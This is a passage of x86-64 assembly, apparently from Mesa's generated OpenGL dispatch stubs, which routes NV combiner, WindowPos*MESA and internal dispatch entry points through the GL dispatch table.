jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetCombinerInputParameterivNV), .-GL_PREFIX(GetCombinerInputParameterivNV)
.p2align 4,,15
.globl GL_PREFIX(GetCombinerOutputParameterfvNV)
.type GL_PREFIX(GetCombinerOutputParameterfvNV), @function
GL_PREFIX(GetCombinerOutputParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4952(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetCombinerOutputParameterfvNV), .-GL_PREFIX(GetCombinerOutputParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(GetCombinerOutputParameterivNV)
.type GL_PREFIX(GetCombinerOutputParameterivNV), @function
GL_PREFIX(GetCombinerOutputParameterivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4960(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetCombinerOutputParameterivNV), .-GL_PREFIX(GetCombinerOutputParameterivNV)
.p2align 4,,15
.globl GL_PREFIX(GetFinalCombinerInputParameterfvNV)
.type GL_PREFIX(GetFinalCombinerInputParameterfvNV), @function
GL_PREFIX(GetFinalCombinerInputParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4968(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetFinalCombinerInputParameterfvNV), .-GL_PREFIX(GetFinalCombinerInputParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(GetFinalCombinerInputParameterivNV)
.type GL_PREFIX(GetFinalCombinerInputParameterivNV), @function
GL_PREFIX(GetFinalCombinerInputParameterivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4976(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetFinalCombinerInputParameterivNV), .-GL_PREFIX(GetFinalCombinerInputParameterivNV)
.p2align 4,,15
.globl GL_PREFIX(ResizeBuffersMESA)
.type GL_PREFIX(ResizeBuffersMESA), @function
GL_PREFIX(ResizeBuffersMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 4984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4984(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 4984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ResizeBuffersMESA), .-GL_PREFIX(ResizeBuffersMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2dMESA)
.type GL_PREFIX(WindowPos2dMESA), @function
GL_PREFIX(WindowPos2dMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4992(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2dMESA), .-GL_PREFIX(WindowPos2dMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2dvMESA)
.type GL_PREFIX(WindowPos2dvMESA), @function
GL_PREFIX(WindowPos2dvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5000(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2dvMESA), .-GL_PREFIX(WindowPos2dvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2fMESA)
.type GL_PREFIX(WindowPos2fMESA), @function
GL_PREFIX(WindowPos2fMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 5008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5008(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 5008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2fMESA), .-GL_PREFIX(WindowPos2fMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2fvMESA)
.type GL_PREFIX(WindowPos2fvMESA), @function
GL_PREFIX(WindowPos2fvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5016(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2fvMESA), .-GL_PREFIX(WindowPos2fvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2iMESA)
.type GL_PREFIX(WindowPos2iMESA), @function
GL_PREFIX(WindowPos2iMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2iMESA), .-GL_PREFIX(WindowPos2iMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2ivMESA)
.type GL_PREFIX(WindowPos2ivMESA), @function
GL_PREFIX(WindowPos2ivMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5032(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2ivMESA), .-GL_PREFIX(WindowPos2ivMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2sMESA)
.type GL_PREFIX(WindowPos2sMESA), @function
GL_PREFIX(WindowPos2sMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2sMESA), .-GL_PREFIX(WindowPos2sMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos2svMESA)
.type GL_PREFIX(WindowPos2svMESA), @function
GL_PREFIX(WindowPos2svMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5048(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos2svMESA), .-GL_PREFIX(WindowPos2svMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3dMESA)
.type GL_PREFIX(WindowPos3dMESA), @function
GL_PREFIX(WindowPos3dMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 5056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5056(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 5056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3dMESA), .-GL_PREFIX(WindowPos3dMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3dvMESA)
.type GL_PREFIX(WindowPos3dvMESA), @function
GL_PREFIX(WindowPos3dvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5064(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3dvMESA), .-GL_PREFIX(WindowPos3dvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3fMESA)
.type GL_PREFIX(WindowPos3fMESA), @function
GL_PREFIX(WindowPos3fMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 5072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5072(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 5072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3fMESA), .-GL_PREFIX(WindowPos3fMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3fvMESA)
.type GL_PREFIX(WindowPos3fvMESA), @function
GL_PREFIX(WindowPos3fvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5080(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3fvMESA), .-GL_PREFIX(WindowPos3fvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3iMESA)
.type GL_PREFIX(WindowPos3iMESA), @function
GL_PREFIX(WindowPos3iMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5088(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3iMESA), .-GL_PREFIX(WindowPos3iMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3ivMESA)
.type GL_PREFIX(WindowPos3ivMESA), @function
GL_PREFIX(WindowPos3ivMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5096(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3ivMESA), .-GL_PREFIX(WindowPos3ivMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3sMESA)
.type GL_PREFIX(WindowPos3sMESA), @function
GL_PREFIX(WindowPos3sMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3sMESA), .-GL_PREFIX(WindowPos3sMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos3svMESA)
.type GL_PREFIX(WindowPos3svMESA), @function
GL_PREFIX(WindowPos3svMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5112(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos3svMESA), .-GL_PREFIX(WindowPos3svMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4dMESA)
.type GL_PREFIX(WindowPos4dMESA), @function
GL_PREFIX(WindowPos4dMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5120(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4dMESA), .-GL_PREFIX(WindowPos4dMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4dvMESA)
.type GL_PREFIX(WindowPos4dvMESA), @function
GL_PREFIX(WindowPos4dvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5128(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4dvMESA), .-GL_PREFIX(WindowPos4dvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4fMESA)
.type GL_PREFIX(WindowPos4fMESA), @function
GL_PREFIX(WindowPos4fMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5136(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 5136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4fMESA), .-GL_PREFIX(WindowPos4fMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4fvMESA)
.type GL_PREFIX(WindowPos4fvMESA), @function
GL_PREFIX(WindowPos4fvMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5144(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4fvMESA), .-GL_PREFIX(WindowPos4fvMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4iMESA)
.type GL_PREFIX(WindowPos4iMESA), @function
GL_PREFIX(WindowPos4iMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4iMESA), .-GL_PREFIX(WindowPos4iMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4ivMESA)
.type GL_PREFIX(WindowPos4ivMESA), @function
GL_PREFIX(WindowPos4ivMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5160(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4ivMESA), .-GL_PREFIX(WindowPos4ivMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4sMESA)
.type GL_PREFIX(WindowPos4sMESA), @function
GL_PREFIX(WindowPos4sMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4sMESA), .-GL_PREFIX(WindowPos4sMESA)
.p2align 4,,15
.globl GL_PREFIX(WindowPos4svMESA)
.type GL_PREFIX(WindowPos4svMESA), @function
GL_PREFIX(WindowPos4svMESA):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5176(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(WindowPos4svMESA), .-GL_PREFIX(WindowPos4svMESA)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_648)
.type GL_PREFIX(_dispatch_stub_648), @function
HIDDEN(GL_PREFIX(_dispatch_stub_648))
GL_PREFIX(_dispatch_stub_648):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_648), .-GL_PREFIX(_dispatch_stub_648)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_649)
.type GL_PREFIX(_dispatch_stub_649), @function
HIDDEN(GL_PREFIX(_dispatch_stub_649))
GL_PREFIX(_dispatch_stub_649):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5192(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_649), .-GL_PREFIX(_dispatch_stub_649)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_650)
.type GL_PREFIX(_dispatch_stub_650), @function
HIDDEN(GL_PREFIX(_dispatch_stub_650))
GL_PREFIX(_dispatch_stub_650):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5200(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
